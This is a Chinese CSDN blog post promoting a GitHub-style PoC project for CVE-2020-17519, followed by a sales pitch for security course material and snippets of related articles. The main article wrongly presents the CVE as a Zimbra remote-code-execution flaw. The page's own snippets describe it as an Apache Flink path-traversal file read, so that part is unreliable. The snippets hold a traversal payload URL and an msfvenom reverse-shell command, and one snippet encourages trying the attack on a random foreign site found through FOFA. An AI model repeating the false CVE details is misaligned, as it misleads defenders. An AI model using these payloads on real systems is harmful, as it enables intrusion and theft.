探索CVE-2020-17519:一个深入理解Web安全的实战项目

于 2024-05-15 02:22:12 发布
阅读量830 收藏 16
点赞数 5
分类专栏: 程序员 文章标签: web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968016/article/details/138879941
版权

项目地址:https://gitcode.com/B1anda0/CVE-2020-17519

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

在网络安全领域,CVE(Common Vulnerabilities and Exposures)编号通常用于识别特定的安全漏洞。本项目【https://gitcode.net/B1anda0/CVE-2020-17519】聚焦于CVE-2020-17519,这是一个影响Zimbra Collaboration Suite(ZCS)的高严重性安全漏洞。通过此项目,技术爱好者和安全研究者可以深入了解Web应用漏洞的原理,学习利用与防御方法。

项目简介

CVE-2020-17519是一个远程代码执行(RCE)漏洞,它允许攻击者在未授权的情况下对Zimbra服务器执行任意系统命令。此项目提供了详细的分析报告、 PoC(Proof of Concept)代码以及修复建议,帮助用户了解漏洞的本质及其危害。

技术分析

该漏洞主要源于Zimbra的一个组件,即Zimbra.logServlet,其处理日志文件的方式存在设计缺陷。攻击者可以通过构造恶意请求,使服务器执行任意系统命令。项目中包含的PoC代码展示了如何触发这一漏洞的过程,这对于理解和模拟攻击场景非常有帮助。

应用场景

  1. 学习与研究:对于网络安全专业学生或从业人员,此项目提供了一个鲜活的案例,帮助他们理解Web应用中的RCE漏洞,提升漏洞分析和安全审计能力。
  2. 漏洞检测:IT管理员可以使用PoC代码来检查自己的Zimbra环境是否存在此漏洞,并采取相应措施进行修补。
  3. 软件开发:开发者可以从中学到如何避免类似的设计错误,提高自身产品的安全性。

项目特点

  1. 实战性强:不仅有理论分析,还附带了实际可运行的PoC代码。
  2. 教育价值:针对一个具体的CVE编号,提供了一套完整的学习路径,有助于深化理解。
  3. 持续更新:项目维护者会定期更新信息,包括新发现的变种、修复建议等,保持项目的时效性。
  4. 开源共享:所有资源都是开放的,鼓励社区参与讨论和贡献。

结语

无论你是想要提升安全技能的技术爱好者,还是需要保障企业系统安全的运维人员,亦或是对Web安全感兴趣的开发者,这个项目都值得你一试。通过深入研究CVE-2020-17519,你将更深刻地认识到网络安全的重要性,并掌握更多实践技巧。现在就加入,开始你的探索之旅吧!

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!*

2401_84968016
关注
专栏目录
[网络安全提高篇] 一二八.恶意软件分析之利用MS Defender实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-24 486
前文介绍了IDA Python配置过程和基础用法,然后尝试提取恶意软件的控制流图(CFG)。这篇文章将讲解如何利用MS Defender实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
热门推荐
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
Apache Flink CVE-2020-17519
weixin_45682070的博客
02-04 276
fofa搜索Apache Flink app="APACHE-Flink" &&country="IN" 未授权任意上传jar包导致远程代码执行,找一个阿三的站试试 1:上传生成好的jar包 msfvenom -p java/meterpreter/reverse_tcp LHOST=ip LPORT=4568 -f jar > main.jar 上传jar包之后监听端口 use exploit/multi/handler set payload java/shell/reve
[漏洞预警]Apache Flink 高危漏洞预警(CVE-2020-17518 CVE-2020-17519)
Matrix42
01-07 2022
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞: CVE-2020-17519:攻击者可通过REST API使用…/跳目录实现系统任意文件读取; CVE-2020-17518:通过构造恶意的http header,可实现远程文件写入。 1. 漏洞描述 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历
Apache Flink 目录遍历漏洞 CVE-2020-17519
m0_54323635的博客
08-31 481
2021年01月06日,360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞的风险通告,漏洞编号为CVE-2020-17518,CVE-2020-17519,漏洞等级:高危,漏洞评分:8.5。Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。
CVE-2020-17519:Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)
05-30
使用方法&免责声明 该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。 使用方法:Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行,漏洞地址输出在vul.txt中 影响版本: Apache Flink 1.11.0、1.11.1、1.11.2 工具仅用于安全人员安全测试,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
CVE-2020-17519:CVE-2020-17519猎豹
04-17
CVE-2020-17519 CVE-2020-17519 Cheetah语言版,支持批量扫描。 将ip.txt复制到/script/漏洞探测/Apache/文件夹下,打开Wker主程序
2024年Java多线程实战-从零手搓一个简易线程池(一)定义任务等待队列
最新发布
2301_82257383的博客
05-02 1039
在多线程编程中,线程池是一种非常重要的工具。它可以帮助我们高效地管理线程资源,避免频繁创建和销毁线程带来的性能开销。Java中提供了强大的线程池实现,如 ThreadPoolExecutor ,但有时我们可能希望了解其内部原理,并实现一个简单的线程池来加深对其工作机制的理解,手写线程池也是很多大厂常考的笔试题。开个新坑-手搓简易线程池。本系列文章将从零开始,一步步手工编码实现一个简单但功能完备的线程池。我们将逐步介绍线程池的各个核心组件,并分析它们的作用和实现思路。
安全客 2019Q2.pdf
09-17
从提供的文件内容来看,可以提取出...以上信息涵盖了安全领域内多个方向的知识点,从安全事件分析到具体的攻防技术,再到安全防护的策略和实践,内容非常丰富。这些知识点对于安全爱好者和从业者来说都极具参考价值。
漏洞挖掘技术革新:Kali Linux环境下的实战技巧
!...# 1. Kali Linux漏洞挖掘概述 ...Kali Linux,作为一款专为安全测试、数字取证和逆向工程而设计的操作系统,为安全研究人员提供了一个功能强大的平台。在这一章节中,我们将对Kali Linux以及它在漏洞挖掘中的作用进
漏洞复现----12、Apache Flink目录穿越漏洞(CVE-2020-17519
七天
11-10 2952
文章目录一、漏洞简介二、漏洞复现 一、漏洞简介 Apache Flink 1.11.0中引入的更改,允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。但是访问仅限于JobManager进程可访问的文件。 影响版本: 1.11.0、1.11.1、1.11.2 二、漏洞复现 Payload: 192.168.198.132:8081/#/job-manager/logs/..%252f..%252f..%252f..%252f..%252f..%252f
Apache Flink -任意文件读取漏洞(CVE-2020-17519
chaojixiaojingang
01-06 1196
1.漏洞描述 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 2.影响版本 1.11.0 1.11.1 1.11.2 3.POC /jobmanager/logs/..%252f..%252f..%252f..%252f..%252...
Apache Flink任意文件读取(CVE-2020-17519)
m0_65150886的博客
01-29 271
Apache Flink 功能强大,支持开发和运行多种不同种类的应用程序。它的主要特性包括:批流一体化、精密的状态管理、事件时间支持以及精确一次的状态一致性保障等。Flink不仅可以运行在包括YARN、Mesos、Kubernetes在内的多种资源管理框架上,还支持在裸机集群上独立部署。事实证明,Flink已经可以扩展到数千核心,其状态可以达到TB级别,且仍能保持高吞吐、低延迟的特性。Apache Flink 是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。
【漏洞复现】Apache Flink 文件读取(CVE-2020-17519
weixin_43486390的博客
01-07 363
0x01 漏洞描述 ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.11.0(以及1.11.1和1.11.2中发布的)中引入的更改允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统中的任何文件。 0x02 影响版本 Flink 1.11.0、1.11.1、1.11.2 0x03 漏洞复现 简单验证: 读取该文件可直接判断是否存在漏洞 http://192.168.1.1:8081/jobmanager/logs/
[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)
qq_51577576的博客
09-26 3498
[ vulhub漏洞复现篇 ] Apache Flink目录遍历 2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞,漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,攻击者可通过REST API使用../跳目录实现系统任意文件读取。
CVE-2020-17519 漏洞复现
weixin_43885355的博客
01-31 1363
CVE-2020-17519 0x00 简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 0x01 漏洞概述 CVE-2020-17519 任意文件读取漏洞 Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。 该项更新允许攻击者通过JobManager进程的REST API读取JobManag
漏洞复现 Apache Flink CVE-2020-17519 任意文件读取漏洞
god_Zeo的安全博客
01-06 746
0x01 漏洞简介 Apache Flink Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 CVE-2020-17519 任意文件读取漏洞 Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。 该项更新允许攻击者通过JobM
Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现
Senimo
07-28 1097
Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。 Apache Flink 1.11.0 中引入的更改(以及在 1.11.1 和1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取JobManager本地文件系统上的任何文件。 访问仅限于
FusionAuth 1.10 RCE漏洞(CVE-2020-7799):预览功能漏洞利用
CVE-2020-7799是一个严重的安全漏洞,它暴露了FusionAuth 1.10版本在处理邮件模板预览时对用户输入的不恰当信任。对于所有依赖此产品的组织,修复和强化安全防护至关重要,以保护其网络环境免受潜在攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值